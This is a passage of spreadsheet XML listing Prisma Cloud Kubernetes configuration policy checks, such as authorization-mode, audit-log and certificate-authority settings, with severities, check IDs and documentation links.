      </c>
      <c r="Y1195" t="inlineStr"/>
      <c r="Z1195" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1195" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1195" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1195" t="inlineStr">
        <is>
          <t>CKV_K8S_95</t>
        </is>
      </c>
      <c r="AD1195" t="b">
        <v>1</v>
      </c>
      <c r="AE1195" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1195" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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5" t="inlineStr">
        <is>
          <t>36b3a264-517b-4b3c-ab08-bfe8fe9326e7</t>
        </is>
      </c>
      <c r="AI1195" t="inlineStr"/>
      <c r="AJ1195" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1195" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1196">
      <c r="A1196" t="inlineStr"/>
      <c r="B1196" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1196" s="2" t="inlineStr"/>
      <c r="D1196" t="inlineStr"/>
      <c r="E1196" t="inlineStr"/>
      <c r="F1196" t="inlineStr"/>
      <c r="G1196" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1196" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1196" t="inlineStr">
        <is>
          <t>The --service-account-private-key-file argument for controller managers is not set appropriately</t>
        </is>
      </c>
      <c r="L1196" t="inlineStr"/>
      <c r="M1196" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1196" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1196" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1196" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1196" t="inlineStr"/>
      <c r="R1196" t="inlineStr"/>
      <c r="S1196" t="inlineStr"/>
      <c r="T1196" t="b">
        <v>0</v>
      </c>
      <c r="U1196" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1196" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1196" t="inlineStr">
        <is>
          <t>Ensure that the --service-account-private-key-file argument is set as appropriate</t>
        </is>
      </c>
      <c r="X1196" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1196" t="inlineStr"/>
      <c r="Z1196" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1196" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1196" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1196" t="inlineStr">
        <is>
          <t>CKV_K8S_110</t>
        </is>
      </c>
      <c r="AD1196" t="b">
        <v>1</v>
      </c>
      <c r="AE1196" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1196" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>28873c1a-82d2-4390-9e59-ca4e99a709e7</t>
        </is>
      </c>
      <c r="AI1196" t="inlineStr"/>
      <c r="AJ1196" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1196" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1197">
      <c r="A1197" t="inlineStr"/>
      <c r="B1197" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1197" s="2" t="inlineStr"/>
      <c r="D1197" t="inlineStr"/>
      <c r="E1197" t="inlineStr"/>
      <c r="F1197" t="inlineStr"/>
      <c r="G1197" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1197" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1197" t="inlineStr">
        <is>
          <t>Encryption providers are not appropriately configured</t>
        </is>
      </c>
      <c r="L1197" t="inlineStr"/>
      <c r="M1197" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1197" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1197" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1197" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1197" t="inlineStr"/>
      <c r="R1197" t="inlineStr"/>
      <c r="S1197" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1197" t="b">
        <v>0</v>
      </c>
      <c r="U1197" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1197" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1197" t="inlineStr">
        <is>
          <t>Ensure that encryption providers are appropriately configured</t>
        </is>
      </c>
      <c r="X1197" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1197" t="inlineStr"/>
      <c r="Z1197" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1197" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1197" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1197" t="inlineStr">
        <is>
          <t>CKV_K8S_104</t>
        </is>
      </c>
      <c r="AD1197" t="b">
        <v>1</v>
      </c>
      <c r="AE1197" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1197" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>b52de5ab-ae4e-461f-a94d-5980a59078bf</t>
        </is>
      </c>
      <c r="AI1197" t="inlineStr"/>
      <c r="AJ1197" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1197" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1198">
      <c r="A1198" t="inlineStr"/>
      <c r="B1198" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1198" s="2" t="inlineStr"/>
      <c r="D1198" t="inlineStr"/>
      <c r="E1198" t="inlineStr"/>
      <c r="F1198" t="inlineStr"/>
      <c r="G1198" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1198" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1198" t="inlineStr">
        <is>
          <t>The --protect-kernel-defaults argument is not set to True</t>
        </is>
      </c>
      <c r="L1198" t="inlineStr"/>
      <c r="M1198" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1198" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1198" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1198" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1198" t="inlineStr"/>
      <c r="R1198" t="inlineStr"/>
      <c r="S1198" t="inlineStr"/>
      <c r="T1198" t="b">
        <v>0</v>
      </c>
      <c r="U1198" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1198" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1198" t="inlineStr">
        <is>
          <t>Ensure that the --protect-kernel-defaults argument is set to true</t>
        </is>
      </c>
      <c r="X1198" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-protect-kernel-defaults-argument-is-set-to-true</t>
        </is>
      </c>
      <c r="Y1198" t="inlineStr"/>
      <c r="Z1198" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1198" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1198" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1198" t="inlineStr">
        <is>
          <t>CKV_K8S_144</t>
        </is>
      </c>
      <c r="AD1198" t="b">
        <v>1</v>
      </c>
      <c r="AE1198" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1198" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>3bbdacbb-5205-4f71-b7c4-baed2e5300fc</t>
        </is>
      </c>
      <c r="AI1198" t="inlineStr"/>
      <c r="AJ1198" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1198" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" t="inlineStr"/>
      <c r="B1199" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1199" s="2" t="inlineStr"/>
      <c r="D1199" t="inlineStr"/>
      <c r="E1199" t="inlineStr"/>
      <c r="F1199" t="inlineStr"/>
      <c r="G1199" t="b">
        <v>1</v>
      </c>
      <c r="H11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199" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1199" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1199" t="inlineStr">
        <is>
          <t>The admission control plugin AlwaysPullImages is not set</t>
        </is>
      </c>
      <c r="L1199" t="inlineStr"/>
      <c r="M1199" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1199" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1199" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1199" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1199" t="inlineStr"/>
      <c r="R1199" t="inlineStr"/>
      <c r="S1199" t="inlineStr"/>
      <c r="T1199" t="b">
        <v>0</v>
      </c>
      <c r="U1199" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1199" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1199" t="inlineStr">
        <is>
          <t>Ensure that the admission control plugin AlwaysPullImages is set</t>
        </is>
      </c>
      <c r="X1199" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-admission-control-plugin-alwayspullimages-is-set</t>
        </is>
      </c>
      <c r="Y1199" t="inlineStr"/>
      <c r="Z1199" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1199" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1199" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1199" t="inlineStr">
        <is>
          <t>CKV_K8S_80</t>
        </is>
      </c>
      <c r="AD1199" t="b">
        <v>1</v>
      </c>
      <c r="AE1199" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1199" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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199" t="inlineStr">
        <is>
          <t>fe981952-2e96-4313-ab0e-05925403d50d</t>
        </is>
      </c>
      <c r="AI1199" t="inlineStr"/>
      <c r="AJ1199" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1199" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" t="inlineStr"/>
      <c r="B1200" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1200" s="2" t="inlineStr"/>
      <c r="D1200" t="inlineStr"/>
      <c r="E1200" t="inlineStr"/>
      <c r="F1200" t="inlineStr"/>
      <c r="G1200" t="b">
        <v>1</v>
      </c>
      <c r="H12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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1200" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1200" t="inlineStr">
        <is>
          <t>The --audit-log-maxbackup argument is not set appropriately</t>
        </is>
      </c>
      <c r="L1200" t="inlineStr"/>
      <c r="M1200" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1200" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1200" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1200" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1200" t="inlineStr"/>
      <c r="R1200" t="inlineStr"/>
      <c r="S1200" t="inlineStr"/>
      <c r="T1200" t="b">
        <v>0</v>
      </c>
      <c r="U1200" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1200" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1200" t="inlineStr">
        <is>
          <t>Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate</t>
        </is>
      </c>
      <c r="X1200" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate</t>
        </is>
      </c>
      <c r="Y1200" t="inlineStr"/>
      <c r="Z1200" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1200" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1200" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1200" t="inlineStr">
        <is>
          <t>CKV_K8S_93</t>
        </is>
      </c>
      <c r="AD1200" t="b">
        <v>1</v>
      </c>
      <c r="AE1200" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1200" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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0" t="inlineStr">
        <is>
          <t>a6e0292e-c91a-4339-a2b3-29141f6a9b94</t>
        </is>
      </c>
      <c r="AI1200" t="inlineStr"/>
      <c r="AJ1200" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1200" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" t="inlineStr"/>
      <c r="B1201" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1201" s="2" t="inlineStr"/>
      <c r="D1201" t="inlineStr"/>
      <c r="E1201" t="inlineStr"/>
      <c r="F1201" t="inlineStr"/>
      <c r="G1201" t="b">
        <v>1</v>
      </c>
      <c r="H12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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1201" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1201" t="inlineStr">
        <is>
          <t>The --authorization-mode argument does not include node</t>
        </is>
      </c>
      <c r="L1201" t="inlineStr"/>
      <c r="M1201" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1201" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1201" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1201" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1201" t="inlineStr"/>
      <c r="R1201" t="inlineStr"/>
      <c r="S1201" t="inlineStr"/>
      <c r="T1201" t="b">
        <v>0</v>
      </c>
      <c r="U1201" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1201" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1201" t="inlineStr">
        <is>
          <t>Ensure that the --authorization-mode argument includes Node</t>
        </is>
      </c>
      <c r="X1201" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-node</t>
        </is>
      </c>
      <c r="Y1201" t="inlineStr"/>
      <c r="Z1201" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1201" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1201" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1201" t="inlineStr">
        <is>
          <t>CKV_K8S_75</t>
        </is>
      </c>
      <c r="AD1201" t="b">
        <v>1</v>
      </c>
      <c r="AE1201" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1201" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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1" t="inlineStr">
        <is>
          <t>5cc5bc2e-ad86-49e7-b48e-5e64745439c4</t>
        </is>
      </c>
      <c r="AI1201" t="inlineStr"/>
      <c r="AJ1201" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1201" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" t="inlineStr"/>
      <c r="B1202" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1202" s="2" t="inlineStr"/>
      <c r="D1202" t="inlineStr"/>
      <c r="E1202" t="inlineStr"/>
      <c r="F1202" t="inlineStr"/>
      <c r="G1202" t="b">
        <v>1</v>
      </c>
      <c r="H12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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1202" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1202" t="inlineStr">
        <is>
          <t>The --token-auth-file argument is Set</t>
        </is>
      </c>
      <c r="L1202" t="inlineStr"/>
      <c r="M1202" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1202" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1202" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1202" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1202" t="inlineStr"/>
      <c r="R1202" t="inlineStr"/>
      <c r="S1202" t="inlineStr"/>
      <c r="T1202" t="b">
        <v>0</v>
      </c>
      <c r="U1202" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1202" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1202" t="inlineStr">
        <is>
          <t>Ensure that the --token-auth-file argument is not set</t>
        </is>
      </c>
      <c r="X1202" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-token-auth-file-parameter-is-not-set</t>
        </is>
      </c>
      <c r="Y1202" t="inlineStr"/>
      <c r="Z1202" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1202" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1202" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1202" t="inlineStr">
        <is>
          <t>CKV_K8S_70</t>
        </is>
      </c>
      <c r="AD1202" t="b">
        <v>1</v>
      </c>
      <c r="AE1202" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1202" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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2" t="inlineStr">
        <is>
          <t>2972e238-4811-41dd-947c-2a52f1512e80</t>
        </is>
      </c>
      <c r="AI1202" t="inlineStr"/>
      <c r="AJ1202" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1202" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" t="inlineStr"/>
      <c r="B1203" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1203" s="2" t="inlineStr"/>
      <c r="D1203" t="inlineStr"/>
      <c r="E1203" t="inlineStr"/>
      <c r="F1203" t="inlineStr"/>
      <c r="G1203" t="b">
        <v>1</v>
      </c>
      <c r="H12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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1203" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1203" t="inlineStr">
        <is>
          <t>The --root-ca-file argument for controller managers is not set appropriately</t>
        </is>
      </c>
      <c r="L1203" t="inlineStr"/>
      <c r="M1203" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1203" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1203" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1203" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1203" t="inlineStr"/>
      <c r="R1203" t="inlineStr"/>
      <c r="S1203" t="inlineStr"/>
      <c r="T1203" t="b">
        <v>0</v>
      </c>
      <c r="U1203" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1203" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1203" t="inlineStr">
        <is>
          <t>Ensure that the --root-ca-file argument is set as appropriate</t>
        </is>
      </c>
      <c r="X1203" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-root-ca-file-argument-is-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1203" t="inlineStr"/>
      <c r="Z1203" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1203" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1203" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1203" t="inlineStr">
        <is>
          <t>CKV_K8S_111</t>
        </is>
      </c>
      <c r="AD1203" t="b">
        <v>1</v>
      </c>
      <c r="AE1203" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1203" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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3" t="inlineStr">
        <is>
          <t>aa9d1111-eb5b-4549-8ea7-3d57d9d59f93</t>
        </is>
      </c>
      <c r="AI1203" t="inlineStr"/>
      <c r="AJ1203" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1203" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" t="inlineStr"/>
      <c r="B1204" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1204" s="2" t="inlineStr"/>
      <c r="D1204" t="inlineStr"/>
      <c r="E1204" t="inlineStr"/>
      <c r="F1204" t="inlineStr"/>
      <c r="G1204" t="b">
        <v>1</v>
      </c>
      <c r="H12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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1204" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1204" t="inlineStr">
        <is>
          <t>The --kubelet-certificate-authority argument is not set appropriately</t>
        </is>
      </c>
      <c r="L1204" t="inlineStr"/>
      <c r="M1204" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1204" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1204" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1204" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1204" t="inlineStr"/>
      <c r="R1204" t="inlineStr"/>
      <c r="S1204" t="inlineStr"/>
      <c r="T1204" t="b">
        <v>0</v>
      </c>
      <c r="U1204" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1204" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1204" t="inlineStr">
        <is>
          <t>Ensure that the --kubelet-certificate-authority argument is set as appropriate</t>
        </is>
      </c>
      <c r="X1204" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate</t>
        </is>
      </c>
      <c r="Y1204" t="inlineStr"/>
      <c r="Z1204" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1204" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1204" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1204" t="inlineStr">
        <is>
          <t>CKV_K8S_73</t>
        </is>
      </c>
      <c r="AD1204" t="b">
        <v>1</v>
      </c>
      <c r="AE1204" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1204" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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4" t="inlineStr">
        <is>
          <t>524428c1-2e12-442b-a0b7-3fd6a454b27b</t>
        </is>
      </c>
      <c r="AI1204" t="inlineStr"/>
      <c r="AJ1204" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1204" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" t="inlineStr"/>
      <c r="B1205" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1205" s="2" t="inlineStr"/>
      <c r="D1205" t="inlineStr"/>
      <c r="E1205" t="inlineStr"/>
      <c r="F1205" t="inlineStr"/>
      <c r="G1205" t="b">
        <v>1</v>
      </c>
      <c r="H12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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1205" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="K1205" t="inlineStr">
        <is>
          <t>The --use-service-account-credentials argument for controller managers is not set to True</t>
        </is>
      </c>
      <c r="L1205" t="inlineStr"/>
      <c r="M1205" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1205" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1205" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1205" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1205" t="inlineStr"/>
      <c r="R1205" t="inlineStr"/>
      <c r="S1205" t="inlineStr"/>
      <c r="T1205" t="b">
        <v>0</v>
      </c>
      <c r="U1205" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1205" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:containers</t>
        </is>
      </c>
      <c r="W1205" t="inlineStr">
        <is>
          <t>Ensure that the --use-service-account-credentials argument is set to true</t>
        </is>
      </c>
      <c r="X1205" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-use-service-account-credentials-argument-is-set-to-true</t>
        </is>
      </c>
      <c r="Y1205" t="inlineStr"/>
      <c r="Z1205" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["containers"]}</t>
        </is>
      </c>
      <c r="AA1205" t="inlineStr">
        <is>
